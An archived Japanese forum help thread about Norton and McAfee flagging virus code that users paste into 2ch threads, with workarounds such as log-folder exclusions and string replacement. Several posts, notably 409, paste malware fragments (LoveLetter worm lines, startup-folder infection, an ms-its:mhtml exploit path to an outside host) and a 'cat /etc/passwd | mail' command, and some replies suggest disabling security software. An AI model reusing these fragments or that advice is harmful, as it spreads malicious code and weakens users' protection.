ノートンがvbsウィルスのソースに誤反応３

[表示 : 全て最新50 1-99 101- 201- 301- 401- 501- 601- 701- 2chのread.cgiへ]
Update time : 12/10 22:53 / Filesize : 258 KB / Number-of Response : 783
[このスレッドの書き込みを削除する]
[＋板最近立ったスレ＆熱いスレ一覧 : ＋板最近立ったスレ／記者別一覧] [類似スレッド一覧]


↑キャッシュ検索、類似スレ動作を修正しました、ご迷惑をお掛けしました

1 名前：他のアンチウィルスソフトが反応する場合もあります mailto:sage [05/03/01 01:58:58 ID:???]: 只今2chでvbsのウィルスのソースを貼りノートンなどのセキュリティツールを誤反応させるのが流行っています。
あまりにも質問スレなどで既出の（このvbsの）質問が多すぎるのでこのスレへURLを貼って誘導してください。
また新たなパターンのvbsが見つかったら一応このスレで報告願えると幸いです。

■この問題について■
2chのスレにvbsウィルスのソースを書き込むことによってブラウザがそのスレのhtmlファイルをダウンロードする際に
ウィルスのパターンと一致するので、ウィルスが検出されたとノートン先生などが騒ぎます。（設定によっては反応しないこともありますが、全く問題ありません）
ご存知の通り、htmlを読んでもこのvbsのソースは実行されることは無いので、全く問題ありません。
また、デフォルトだとIEはInternet Temporary Filesフォルダにhtmlをダウンロードしますので、感染ファイルはここのhtmlファイルにになります。
これらのファイルは削除しても全く問題ありませんが、該当スレを読み直すとまたvbsのソース付きhtmlがダウンロードされてしまうので警告が出ます。

■まとめと対策■
２ちゃんねる見ていたらvbsウィルスが検出された！
info.2ch.net/wiki/pukiwiki.php?%A5%CE%A1%BC%A5%C8%A5%F3%C6%FE%A4%EC%A4%BF%A4%E9%A3%B2ch%A4%CB%BD%F1%A4%AD%A4%B3%A4%E1%A4%CA%A4%A4%BF%CD%A4%D8#faq12
2ちゃんねる専用ブラウザでノートンを使うと今まで取得したログが抹消されてしまい、スレを再表示した時全てが新しいレスになってしまいます、どうすれば解決できるでしょうか？
info.2ch.net/wiki/pukiwiki.php?%A5%CE%A1%BC%A5%C8%A5%F3%C6%FE%A4%EC%A4%BF%A4%E9%A3%B2ch%A4%CB%BD%F1%A4%AD%A4%B3%A4%E1%A4%CA%A4%A4%BF%CD%A4%D8#faq08
2chブラウザのログ保存フォルダを「除外」に設定。
NAV2003以降はNorton Anti Virusのオプションで手動スキャンとAuto-Protectでそれぞれ除外の指定をして下さい。

前スレ
ノートンがvbsウィルスのソースに誤反応
pc.2ch.net/test/read.cgi/sec/1025872269/
ノートンがvbsウィルスのソースに誤反応２
pc5.2ch.net/test/read.cgi/pcqa/1033948204/

テンプレ>>1-10あたり
357 名前：ひよこ名無しさん mailto:sage [2005/11/28(月) 14:10:20 ID:???]: >>355
＞Jane系なら、問題の文字列を別の文字列に置き換えればおｋ、という案もNortonスレで出てましたが

誘導もしくは詳しくお願いします。
358 名前：ひよこ名無しさん mailto:sage [2005/11/28(月) 14:42:24 ID:???]: >>357
<ここ数日2chを騒がせている侵入検知トラップの対策法>
症状：
Norton Internet Securityを使用している人で、特定の文字列を書かれると侵入検知が多発し
最短30分間そのアドレスがNISにより規制されるためログが読めなくなる。

対策：上に行くほどおすすめ
①Jane系の専用ブラウザ使ってる場合
JaneフォルダにReplaceStr.txtというテキストファイルを作り
onload＝[Tab]onload＝
みたいに置き換えればOK（↑の”[Tab]”はタブ入力）
Tabキーを押すのを忘れて[Tab]onloadとそのまま書いてはダメ

②Replace法が使えない場合(他の専用ブラウザ、IEなど)
Nortonの統計ログの侵入検知の項目を見て、ブロックされているサーバ名を確認(例:tmp5.2ch.net)
侵入検知の設定で除外に上で確認したサーバ名を入れる
ただしこの方法は穴を作ることになるのであまりおすすめではない

③よくわかんね、って人
読み書きするときに「Norton Internet Securityを無効にする」を選んで一時的にNISを切る。
このときAuto-Protectを切っても無意味なので注意。Auto-ProtectはAntivirusなので。

ガセビアの沼
・Love-letterと同じVB使った疑似ウイルスだからNAVの除外設定に専用ブラウザのログフォルダを入れてやればいい、というのはガセ
　今回のはNAVではなくNIS管轄のトラップです

Nortonスレはこちら。
ただし、問題の起こる文字列が貼られているので、読み込むときには上記対策のいずれかを行ってください。
【ﾉｰﾄﾝ】ｲﾝﾀｰﾈｯﾄｾｷｭﾘﾃｨ Ver.77【2006】
pc8.2ch.net/test/read.cgi/sec/1132279196/
359 名前：ひよこ名無しさん mailto:<body onload=window()> [2005/11/28(月) 14:57:54 ID:???]: (笑)
360 名前：ひよこ名無しさん mailto:sage [2005/11/28(月) 17:12:55 ID:???]: www.computerterrorism.com/research/ie/poc.htm#
www.computerterrorism.com/research/ie/fillmem.htm
www.computerterrorism.com/research/ie/bug.htm
361 名前：ひよこ名無しさん mailto:sage [2005/11/28(月) 17:30:40 ID:???]: >>358
それガセらしいじゃないか・・・
｡ﾟ(ﾟ´Д｀ﾟ)゜｡ｳｧｧｧﾝ
362 名前：ひよこ名無しさん mailto:sage [2005/11/28(月) 17:33:17 ID:???]: >>361
あーはいはい。

1. [ファイアウォール]をダブルクリック
2. [ネットワーク]をクリック
3. [信頼]をクリック
4. [追加]をクリック
5. [範囲を使う]をチェック
6. 開始アドレスに「206.223.147.0」を入力、終了アドレスに「206.223.154.255」してOKをクリック
363 名前：eip = eip + unescape("%u7030%u4300") mailto:"<body onload=window();>" [2005/11/28(月) 19:44:46 ID:???]: www.computerterrorism.com/research/ie/poc.htm#
www.computerterrorism.com/research/ie/fillmem.htm
www.computerterrorism.com/research/ie/bug.htm
364 名前：ひよこ名無しさん mailto:sage [2005/11/28(月) 20:55:42 ID:???]: ms-its:mhtml:file://c:\
365 名前：名無しさん＠お腹いぱーい。 mailto:sage [2005/11/29(火) 00:32:03 ID:??? BE:2515744-##]: とりあえずKnowledge Base 経由で>>352のソースをﾂﾏﾝﾃｯｸに送って対応を催促しますた。
366 名前：ひよこ名無しさん mailto:sage [2005/11/29(火) 00:54:38 ID:???]: 馬鹿だなノートン。
367 名前：ひよこ名無しさん mailto:sage [2005/11/29(火) 10:34:17 ID:???]: ノートンの誤作動対策したら、
スクリプトを仕組んでるスレみると、変に改行されてしまう（\r\n\r\n)のはなぜ？
368 名前：名無しさん＠お腹いぱーい。 mailto:sage [2005/11/29(火) 12:44:31 ID:??? BE:1415333-##]: >>367
>>362の設定ですか？
2ちゃんねるブラウザでの不具合は
お使いの2ちゃんねるブラウザのスレで環境を詳しく書いてお聞きください。
369 名前：cen ◆Pm9xOTJuM. mailto:sage [2005/11/30(水) 00:10:23 ID:???]: >>352について、役に立つかは知らないですが、>>17のソフトにて
対応させてみました。
www.geocities.jp/cen_hp/program3.html
370 名前：ひよこ名無しさん [2005/12/11(日) 18:48:05 ID:J4cBBOMR]: 【アメリカ】全米各地で中国系中心に「アジア人」生徒へのいじめが増加…問題の根深く
news19.2ch.net/test/read.cgi/newsplus/1134279288/
371 名前：名無しさん＠お腹いぱーい。 mailto:sage [2005/12/12(月) 00:37:26 ID:??? BE:1257942-##]: 現在、2ちゃんねるではNIS(NPF)のファイアーウォールを誤作動させるコードの書き込みが出回っています。
アンチウイルス(NAV)は反応しないのでファイアーウォールの設定を見直さなければなりませんがあくまで暫定的処置です。

２chNIS問題まとめページ
mickey.mirv.net/2chnis.html
ノートン応急対策
info.2ch.net/wiki/pukiwiki.php?%CA%E4%C2%AD%A4%C8%CA%E4%B4%B0#Norton_Emergency_measures
ansitu.xrea.jp/guidance/?NortonInternetSecurity#Emergency_measures ansitu.xrea.jp/guidance/?Trap#Emergency_measures
wiki.livedoor.jp/kizyo1234/d/%a5%ce%a1%bc%a5%c8%a5%f3%b4%d8%cf%a2

この場合2ちゃんねるに対してファイアーウォールの機能は働きません。
また、同様なコードが2ちゃんねるではない外部板に貼られていても上記ページのような設定はお勧めしません。
シマンテックの対応待ちです。

アンチウイルス(NAV)の設定は>>1
ansitu.xrea.jp/guidance/?Trap#NortonTrap
372 名前：ひよこ名無しさん [2005/12/12(月) 23:03:17 ID:TJ/QcL4e]: <body onload=windowあ()>　ms-its:mhtml:fileあ://c:\

↑ひらがな抜いて書き込みすると誤作動します。
誤作動うざい。
373 名前：ひよこ名無しさん mailto:sage [2005/12/12(月) 23:14:43 ID:???]: doredore,
<body onload=window()>　ms-its:mhtml:file://c:\
374 名前：ひよこ名無しさん mailto:sage [2005/12/13(火) 00:32:45 ID:???]: i|!| |i┏┓! i!┏┳┓| |||i|!i| ||!i|| |||ii| ||| ||| |i||!|i│i!┏┓i!|
|i|┏┛┗━╋┻┛|i!||!|ii|| i|!i||i|┏━┓ ┏┓i|i| i┃┃i!|
i||┗┓┏┓┃||i┏━━━━┓┗━┛ ┃┃|i||!i┃┃i!|
|i |!|i┃┃┃┃i||┗━━━━┛|i|| || ||||!┃┃i|i| i┗┛!i|
i||i ||┃┃┃┃|! |||i ||i　　　　!|||!|┏━━┛┃|i||!i┏┓i|!
|i!i |!┗┛┗┛i|!i|　 / |　　　/ |　┗━━━┛i|i| i┗┛i!|
i| |||i|!i| ||!|i||i!　　　/,_ ┴─/　ヽ　　　 |!i| ||| |i||!|i|i|||| ||i
|i|| ||i!i||　　　　　（_゜.,》.'(_゜,》)ﾐヽ　　　　　　! | |!i||!|ii||!|ii|
i|ii　　　　　　　 / ,,_＿,ニ、、ﾉ( |　　　　　　　　　　　i|i!|i|
|i　　　　　　　　|　Y~~/~y} ｀,　~ |　そ、そんなー… 　 |i
!.　　　　　　　 | ,k.,.,!,.,.,r|　,!　く　　　　　　　　　 .!
i　　　　　　　／ <ニニニ'ノ　　＼　　　　　　　　ｌ
375 名前：ひよこ名無しさん [2005/12/14(水) 08:34:01 ID:9z0oGE5T BE:229219294-#]: てｔ
376 名前：ひよこ名無しさん mailto:sage [2005/12/16(金) 07:08:09 ID:???]: vicptdelで処理した後、久々にNAVでJaneのlogをスキャンしてみたら、
以下のレスがvicptdelで処理されていなかったらしく、NAVに削除されました。
ttp://tmp5.2ch.net/test/read.cgi/download/1133670032/11
ttp://makimo.to/2ch/tmp5_download/1133/1133670032.html#11

cenさんもしよろしければ、対応お願いします。

またスレタイがウィルスコードだったのか分かりませんが、subject.txtに
以下のUnix Penguinが入っていましたが、datだけでなく、
vicptdelでsubject.txt等も対応できないでしょうか？
caXt /etc/paXsswd | mail noXbody　(Xを削除)
377 名前：cen ◆Pm9xOTJuM. mailto:sage [2005/12/18(日) 00:49:25 ID:???]: >>376
そのスレの11ですが、そのパターンは対応していますよ。
手で11のdatを作って、スキャンしたら無効化されました。
デフォルトだとスキャンする時から10日前以降に更新されたdat
ファイルのみスキャンする設定なので、すべてのdatファイルを
スキャンする設定でしてみてください。

あと、subject.txtは専用ブラウザで板を見るときに常に更新するもの
だと思いますので、無効化しても効果がないので、スキャンはしない
です。
378 名前：ひよこ名無しさん [2005/12/22(木) 17:14:31 ID:Y2IitcnV]: ノートンインターネット2006を入れたのですが、初心者の質問の板が
見れたり見れなかったりします。見れてもウィルス反応がでてしまう
のですが、2006の設定を教えて下さい。
お願いします。
379 名前：ひよこ名無しさん mailto:sage [2005/12/22(木) 17:23:38 ID:???]: >>378
ノートンを切る
それだけ
380 名前：ひよこ名無しさん [2005/12/22(木) 19:21:21 ID:Z1b4rF6D]: NIS2006を入れたんですが、誤反応しません。
設定が悪くセキュリティが甘くなってるのでしょうか？
381 名前：ひよこ名無しさん mailto:sage [2005/12/22(木) 19:37:59 ID:???]: >>380
割れてます。
382 名前：ひよこ名無しさん mailto:380 [2005/12/22(木) 20:22:37 ID:???]: >>381
普通にLiveUpdateとかできるのに…いや、それより何故割れてるって解るんでしょうか？
383 名前：ひよこ名無しさん mailto:sage [2005/12/22(木) 20:23:54 ID:???]: >>382
(((((((( ；ﾟДﾟ)))))))ｶﾞｸｶﾞｸﾌﾞﾙﾌﾞﾙ
384 名前：ひよこ名無しさん mailto:age [2005/12/23(金) 00:52:52 ID:???]: 　　　　　 .l l ＼| |　！ノートン先生　！　／/U　ヽ＿＿＿/
パソコン蛾人　　＼　！！大激怒！！　／／　　　U　　　　:::U:
ぶっ壊れ（＿_）　　＼　！！！！！　／　/／＿__　　　＼　　:::
たお！　（＿＿）　　　＼∧∧∧∧／　　 |　　|　　 |　　　　U ::::
　　　　（`Д´＃）　　　＜　ぶパ　＞　　　|U　|　　　|　　　　　::U:
　　＿|￣￣||＿）＿　＜　　っ　ソ＞　　　 |　├―-┤　U.....::::
　／旦|――||/／／|　＜　壊コ　＞　　　　ヽ　　　　　.....:::::::::
─────────＜　れン　＞──────────
<　　＿,ノ , 、ヽ､＿　ノ＜　た　蛾＞　　ﾌﾟｽﾌﾟｽﾌﾟｽ･･・・・∬∬
　（y○'）｀ヽ) ( ´（y○'）＜　 !!! 　　＞踏んじゃったよぉ＿＿＿
　　⌒　/　　　　ヽ⌒　／∨∨∨∨＼　　　∧＿∧　　|｜＼　　
うわあ |~￣￣~.|ぁぁ／パソコン蛾ぶ＼　（；´Д｀）　 |｜　｜
ぁぁ|　|||! i: |||! !|ぁ／っ壊れた！ディス　＼（　　つ／￣|｜／
ぁぁ| |||| !! !!||| :|／プレイが砕け散った！＼ヽ　|二二二」
385 名前：ひよこ名無しさん [2005/12/26(月) 23:44:59 ID:JAAmlww2]: life7.2ch.net/test/read.cgi/kankon/1134376159/
このスレにアクセスしたらウイルスが検出されます。
どうしたらいいですか？
386 名前：ひよこ名無しさん mailto:sage [2005/12/26(月) 23:46:05 ID:???]: >>385
このスレを一通り読んでから質問しろよ情報乞食
387 名前：ひよこ名無しさん mailto:sage [2005/12/26(月) 23:48:53 ID:???]: >>385
何でそうやってすぐに聞こうとするの？
まともな日本語能力と社会的常識を持っていれば
ちょっと調べれば、ちょっと読めば解決するのに
388 名前：ひよこ名無しさん [2005/12/26(月) 23:54:34 ID:TT8kYPqv]: ttp://210.150.222.13/cgi-bin/imgbbs01/imgboard.cgi
の掲示板に貼られている空白？の画像はスパイウェアー
だと他の利用者が知らせてくれたのですが、
もしかしたらクリックしてしまったたかもしれません
スパイウェアーというのは感染するとどうなってしまうのでしょうか？
怖いので今日中に再フォーマットするつもりですが・・・
389 名前：ひよこ名無しさん mailto:sage [2005/12/26(月) 23:58:53 ID:???]: >>388
で、何故このスレで聞こうと思ったの？
390 名前：ひよこ名無しさん mailto:sage [2005/12/26(月) 23:59:45 ID:???]: 自称PC初心者はスレタイも読めない日本語初心者…っと。
391 名前：ひよこ名無しさん [2005/12/27(火) 00:04:42 ID:TZFt/HNg]: >>389
あ、今、別のスレで教えてもらえました
すいませんm(__)m
392 名前：ひよこ名無しさん mailto:sage [2005/12/27(火) 01:32:52 ID:???]: >>388
踏んだ　踏んだ　どうにもならへん
内部で呼び出しているサーバーがお休みのようだ
マカフィーさんも無反応
XP_SP2にとってはブラクラ以外の何物にもならない
393 名前：ひよこ名無しさん mailto:age [2006/01/05(木) 11:05:53 ID:???]: じいさんのためにage
394 名前：ひよこ名無しさん mailto:sage [2006/01/09(月) 23:41:35 ID:???]: バージョン】　1.12
【　スキン　】　default
【　　　IE　　　】　6.0.2900.2180
【　Windows　】　Windows XP Home Edition (Service Pack 2)
【　不具合　】　生活板がどのスレッドも見れません。
【詳しい内容】　　ボードデータの更新をしても、スレッドの更新をしても、再インストールしても
見れません。ちなみに専用ブラウザを使用しなくても見れなくなってしまいました。
何が原因なのでしょうか…？
395 名前：ひよこ名無しさん mailto:age [2006/01/10(火) 21:00:00 ID:???]: >>394
ここに来たってことはノートン入れてるんでしょ？
原因はノートン

ついでに保守age
396 名前：ひよこ名無しさん mailto:sage [2006/01/11(水) 08:57:15 ID:???]: ms-its:mhtml:file://c:\
397 名前：ひよこ名無しさん mailto:sega [2006/01/15(日) 20:20:52 ID:???]: 定期age
398 名前：ひよこ名無しさん mailto:sage [2006/01/22(日) 05:06:59 ID:???]: すみません。色々やったけどギブですorz質問よろしいでしょうか…
■janeDoeα 0.1.12.2■ｘｐ■NIS２００４■>>1-9は読みました

>>51 >>56さんとややケースが似てるんですが…
最近ノートン２００４を再ｲﾝｽｺしたので、前と同じ方法（>>1）で
また専ブラのlogフォルダを除外設定しました、が、何故か今度はどう設定やり直しても
下記のスレで先生に怒られます。
pc7.2ch.net/test/read.cgi/pcqa/1109609938/（このスレです…）
pc8.2ch.net/test/read.cgi/hp/1135924815/
警告メッセージのスクショ↓
ttp://vipquality.orz.hm/imageup/file/onz27560.jpg（このスレのです。これが2回でます）
ttp://vipquality.orz.hm/imageup/file/onz27561.jpg（下のスレのです）

で、何度設定しても駄目だったのでこのソフトを入れて、トラップの無効化を試みたんですけど
ttp://www.geocities.jp/cen_hp/program3.html#use_____
やっぱり上記のスレで先生に怒られます。何回かこのソフト起動させてみたんですが
無効化成功してるよ。みたいなメッセージが出るだけで、依然として先生は怒りまくりだし
もうどうしていいか分かりません。誰か助けて～(つД`;)
399 名前：ひよこ名無しさん [2006/01/22(日) 05:20:54 ID:qJbbwLqx]: トラックバック:etc3.2ch.net/test/read.cgi/qa/1137857523/
400 名前：ぼるじょあ ◆yBEncckFOU mailto:sage [2006/01/22(日) 05:37:48 ID:???]: >>398
（・３・）　エェー　そのソフトはdatは対策できるけど、subject.txtは
　　　　　　　　　　対策できないYO
401 名前：名無しさん＠お腹いぱーい。 mailto:sage [2006/01/22(日) 19:21:57 ID:???]: >>398
今一度、Norton Anti Virusのオプションで
手動スキャンとAuto-Protectでlogフォルダの除外の指定をしているか確認してください。

該当スレに書き込んだ・該当スレをお気に入りに入れた・ウイルスコードを検索したりすると
幾つか除外の指定を増やすことになるのでご注意ください。

Janeの場合

Jane2ch\Logs
Jane2ch\favorites.dat　
Jane2ch\kakikomi.txt
Jane2ch\SearchHistory.txt

ε三（; ･∀･）鯖ﾏﾃﾞｵﾂｶｲの場合

otsukai\result.dat

詳しくはお使いの2ちゃんねるブラウザのスレのテンプレや
2ちゃんねるブラウザのヘルプ
2ちゃんねるブラウザ配布サイト等のFAQなどを参照してください。
402 名前：名無しさん＠お腹いぱーい。 mailto:sage [2006/01/22(日) 19:46:59 ID:???]: >>401補足
増えた項目の内、
Jane2ch\favorites.dat　
Jane2ch\kakikomi.txt
otsukai\result.dat
↑はスレタイに反応した場合です。
403 名前：ひよこ名無しさん [2006/01/27(金) 17:56:55 ID:SL6Rf0+0]: Live2chのフォルダごとNorton Anti Virus→除外に設定しても良いの？
404 名前：ひよこ名無しさん [2006/01/28(土) 02:19:43 ID:W65BflbM]: すみません、質問です。
昨日から携帯PHS板を見ていると、ノートンで何度も警告が出て、
WScript.KakWormってやつなんですけど、これは
「kak.hta';ken=wd+'START」ってスレタイがあるせいなのでしょうか？
405 名前：404 mailto:sage [2006/01/28(土) 02:27:13 ID:???]: すみません、テンプレ見ましたm(_ _)m
406 名前：名無しさん＠お腹いぱーい。 mailto:sage [2006/01/28(土) 20:16:04 ID:???]: >>403
Logフォルダを除外に指定してね。
407 名前：ひよこ名無しさん [2006/01/31(火) 10:00:47 ID:nkcqfLth]: 先程、他のスレッド見ていたら、ノートンの低危険度の表示が出てきて遮断をクリックしたら、あらゆるホームページが見れなくなりました。原因解るかた教えてください。宜しくお願いします。m(__)m
408 名前：ひよこ名無しさん mailto:sage [2006/01/31(火) 10:02:30 ID:???]: >>407
誘導されたらそう書け
それと普通>>1から読むもんだ
既知の質問を延々と繰り返し答えさせられるこっちの身にもなれ
409 名前：ひよこ名無しさん mailto:cat /etc/passwd | mail nobody [2006/01/31(火) 10:03:47 ID:???]: これかな？

c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
If s = "htm" and fso.FileExists(f1.path+"l") = False then fso.CopyFile f1.path, f1.path+"l"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93)) 　　
ms-its:mhtml:file://c:\　
kak.hta';ken=wd+'START
End Sub

<body onload=window()>
410 名前：ひよこ名無しさん [2006/01/31(火) 10:08:09 ID:nkcqfLth]: >>408
はぁ？おめーから何も答えてもらってねーぞ。
解らねーんだったらいちいち出てくんじゃねぇよアフォ
411 名前：ひよこ名無しさん mailto:sage [2006/01/31(火) 10:10:37 ID:???]: 言っておくけど、回答者はどこも共通だから
412 名前：ひよこ名無しさん mailto:sage [2006/01/31(火) 10:11:13 ID:???]: i|!| |i┏┓! i!┏┳┓| |||i|!i| ||!i|| |||ii| ||| ||| |i||!|i│i!┏┓i!|
|i|┏┛┗━╋┻┛|i!||!|ii|| i|!i||i|┏━┓ ┏┓i|i| i┃┃i!|
i||┗┓┏┓┃||i┏━━━━┓┗━┛ ┃┃|i||!i┃┃i!|
|i |!|i┃┃┃┃i||┗━━━━┛|i|| || ||||!┃┃i|i| i┗┛!i|
i||i ||┃┃┃┃|! |||i ||i　　　　!|||!|┏━━┛┃|i||!i┏┓i|!
|i!i |!┗┛┗┛i|!i|　 / |　　　/ |　┗━━━┛i|i| i┗┛i!|
i| |||i|!i| ||!|i||i!　　　/,_ ┴─/　ヽ　　　 |!i| ||| |i||!|i|i|||| ||i
|i|| ||i!i||　　　　　（_゜.,》.'(_゜,》)ﾐヽ　　　　　　! | |!i||!|ii||!|ii|
i|ii　　　　　　　 / ,,_＿,ニ、、ﾉ( |　　　　　　　　　　　i|i!|i|
|i　　　　　　　　|　Y~~/~y} ｀,　~ |　そ、そんなー… 　 |i
!.　　　　　　　 | ,k.,.,!,.,.,r|　,!　く　　　　　　　　　 .!
i　　　　　　　／ <ニニニ'ノ　　＼　　　　　　　　ｌ
413 名前：ひよこ名無しさん mailto:sage [2006/01/31(火) 10:12:28 ID:???]: >>410
お前が礼言ってたコテな、テンプレに注意書きがあるくらいの要注意人物なんだよ
414 名前：ひよこ名無しさん mailto:sage [2006/01/31(火) 10:16:03 ID:???]: >>410
ansitu.xrea.jp/guidance/?Trap#It_does_not_cry

ここを読んでください
415 名前：ひよこ名無しさん mailto:sage [2006/01/31(火) 10:16:50 ID:???]: >>410
この部分ね

2005年11月28日現在、2ちゃんねるではNIS(NPF)のファイアーウォールを誤作動させる
コードの書き込みが出回っています。
アンチウイルス(NAV)は反応しないのでファイアーウォールの
設定を見直さなければなりませんがあくまで暫定的処置です。

NIS2005の場合(多分NIS2006も同じ)
416 名前：ひよこ名無しさん [2006/01/31(火) 10:16:58 ID:nkcqfLth]: >>411
解りました。m(__)mではどこで聞いても答えは一緒って事ですね。お手数おかけしました。また何かありましたら宜しくお願いします。
417 名前：VIP＠命 ◆VIPPER/vT. [2006/01/31(火) 10:31:48 ID:nkcqfLth]: あっ。ちなみにぼくは、愛新ではありません。
あしからず
418 名前：ひよこ名無しさん [2006/02/01(水) 13:48:25 ID:S10H/e1R]: 時々ノートンインターネットセキュリティ2004を使用している際、
スレ、もしくは板そのものがサーバーに接続できなくて見ることができません。
アンチウィルスは常時つけていますが、切ってもつけていても見ることができるのですが
この症状はアンチウィルスが反応している訳ではありません
インターネットセキュリティをつけているときだけ見ることができないのですが
なぜなんでしょうか？
もちろんインターネットセキュリティの2CHに書き込める為の設定をしてあります。
これはなぜなんでしょうか？
419 名前：ひよこ名無しさん mailto:sage [2006/02/01(水) 13:55:37 ID:???]: >>418
>>371の問題でもないってことでしょうか。
371の暫定対処をした場合はどうなりますか？
420 名前：418 [2006/02/01(水) 14:05:32 ID:S10H/e1R]: >>419
ありがとうごぜーます。
呼んできます。
421 名前：ひよこ名無しさん [2006/02/02(木) 16:52:23 ID:KtbG8KDn]: ■>>1-9を読みましたか？　　　　　　　　　　　『YES』
マカフィーを使っているのですがdatファイルの入ったzipファイルを解凍しようと
すると「Exploit-mhtresir.gen」が発見されたので削除しますと言われzipファイルの中のdatを
他の場所に保存することもdatファイルを使うことも出来ないのですがどうすれば
zipファイルを解凍して中のdatファイルを使えるようになりますか？

OSはXP
アンチウイルスソフトはManaged virusScan plas AntiSpywareです。
お願いします。
422 名前：ひよこ名無しさん [2006/02/02(木) 17:55:04 ID:KtbG8KDn]: 他できいてみます。
423 名前：名無しさん＠お腹いぱーい。 mailto:sage [2006/02/02(木) 23:44:24 ID:??? BE:7074195- ]: >>421-422
> マカフィーを使っている
> datファイルの入ったzipファイル
２ちゃんねるブラウザのログファイルでは無い場合はこちらのスレでは扱っていません。
このスレでは「ノートントラップ」は２ちゃんねる（掲示板）にウイルスコードが貼り付けられ
Webブラウザや２ちゃんねるブラウザのログでノートンが誤反応することを指しています。

pc7.2ch.net/test/read.cgi/pcqa/1138826147/441
そのzipファイルがアップローダーで拾ったものならマカフィーは正常な反応を示しているかと思います。
念のためにオンラインスキャンしてみてください。
www.trendmicro.co.jp/hcall/index.asp

マカフィーについて以降はより詳しいあなたの環境（zipファイルの出所・何のアプリケーションに使われているのか等）を書いて
以下のスレにここから誘導されたことも併記してお尋ねください。
がんばれマカフィー Part.23 / ガンバレMcAfee
pc8.2ch.net/test/read.cgi/sec/1136576534/

もしマカフィーが２ちゃんねるブラウザのログで反応しているのならお手数ですがもう一度こちらに来てください。
424 名前：ひよこ名無しさん [2006/02/03(金) 09:31:43 ID:ZZST2Rw7]: >>423
ご丁寧に解答を頂きありがとうございます。
datファイルの入ったzipファイルはある２ちゃんねるのスレのまとめサイト
からダウンロードしたファイルです。
オンラインスキャンでは何も見つからなかったです。
>もしマカフィーが２ちゃんねるブラウザのログで反応しているのなら
>お手数ですがもう一度こちらに来てください
datファイルは2ちゃんねるのスレッドのdatファイルなのですが
こちらでよろしいでしょうか？お願いします。
425 名前：421 [2006/02/03(金) 10:12:08 ID:ZZST2Rw7]: すいません>>421の者です。
426 名前：名無しさん＠お腹いぱーい。 mailto:sage [2006/02/03(金) 13:48:07 ID:??? BE:7545986- ]: >>424-425
おそらくそれはウイルスコードにマカフィーが誤反応しているものだと思われます。

他で教えていただいたのですがマカフィーにはノートンのようなウイルススキャンでフォルダ・ファイルの除外項目が無いそうです。
以下、現在の状況での対処方法です。

２ちゃんねるブラウザのJane派生のJaneViewでWickedStr.txtに手動で反応する文字列の一部を追記する。

誤反応スクリプト無効化ソフトttp://www.geocities.jp/cen_hp/program3.htmlのアップデートを待って（現在マカフィートラップには対応していません）
　ActiveShieldを無効→対象スレを取得→「誤反応スクリプト無効化ソフト」を使ってウイルスコードを無効→ActiveShield有効

２ちゃんねるブラウザMonoViewのアップデートを待って（現在マカフィートラップには対応していません）読み込む。

一番いい方法はマカフィーに該当するdatファイルを送って対策を促すことだと思います。

マカフィーユーザーで既に対処の仕方を知っている方がいらっしゃるのかもしれませんので
>>423のマカフィーのスレでこちらのことを聞いてみていただけませんでしょうか。
対処方法がありましたらこちらのスレにもお知らせいただけると幸いです。

また参考のためにも今後もこちらに来ていただけると助かります。

ノートントラップとマカフィートラップのウイルスコードは違うようなので
ノートンでは反応しないでマカフィーが誤反応したりまたその逆もあります。
長々としましたがマカフィートラップについての決定打が見当たらないので手探りのレスを御許しください。

参考にマカフィートラップと思われるやり取りの過去ログです。
pc5.2ch.net/test/read.cgi/sec/1106492538/72-77+553-555+558-559+563
ttp://makimo.to:8000/2ch/pc5_sec/1106/1106492538.html

qb5.2ch.net/test/read.cgi/saku/1097313582/62-65n

ttp://jbbs.livedoor.jp/bbs/read.cgi/computer/10301/1071925088/373-378
427 名前：421 [2006/02/03(金) 14:40:06 ID:ZZST2Rw7]: >>426
わかりやすく説明していただき、
関連スレまで貼っていただいてありがとうございます。
ただ解決まではいけなかったので>>423の方で聞かせて頂きます。
何かわかりましたらこちらにも報告させて頂きますね。
ありがとうございました。
428 名前：ひよこ名無しさん mailto:sage [2006/02/06(月) 19:42:50 ID:???]: なんかjaneでこのスレ読むとレス番がずれまくりなんですけど
これ直す方法はないんでしょうか…？何度再読み込みしても
４２１さんが４０６さんになっちゃいます…↓
>　406 名前：421[] 投稿日：2006/02/03(金) 14:40:06 ID:ZZST2Rw7

ｌogフォルダの除外設定はしてあるので、先生も怒ってないんですが…

ノートン２００４でｘｐ。専ブラはｊａｎｅDoeView α051128です
429 名前：ひよこ名無しさん [2006/02/07(火) 00:57:31 ID:3ZNXNyQs]: XPに最初から入ってるノートンをアンインスコしたらもう再インスコって出来ませんかね？？
430 名前：名無しさん＠お腹いぱーい。 mailto:sage [2006/02/07(火) 01:18:43 ID:??? BE:5659294- ]: >>428
一旦ログを破棄してから読み込みでどうですか。
それと>>371にもありますがNIS(NPF)のファイアーウォールを誤作動させるコードもあるので
以下の設定もしてみてください。

現在、2ちゃんねるではNIS(NPF)のファイアーウォールを誤作動させるコードの書き込みが出回っています。
アンチウイルス(NAV)は反応しないのでファイアーウォールの設定を見直さなければなりませんがあくまで暫定的処置です。

２chNIS問題まとめページ
mickey.mirv.net/2chnis.html
ノートン応急対策
info.2ch.net/wiki/pukiwiki.php?%CA%E4%C2%AD%A4%C8%CA%E4%B4%B0#Norton_Emergency_measures
ansitu.xrea.jp/guidance/?NortonInternetSecurity#Emergency_measures ansitu.xrea.jp/guidance/?Trap#Emergency_measures
wiki.livedoor.jp/kizyo1234/d/%a5%ce%a1%bc%a5%c8%a5%f3%b4%d8%cf%a2

この場合2ちゃんねるに対してファイアーウォールの機能は働きません。
また、同様なコードが2ちゃんねるではない外部板に貼られていても上記ページのような設定はお勧めしません。
シマンテックの対応待ちです。

アンチウイルス(NAV)の設定は>>1
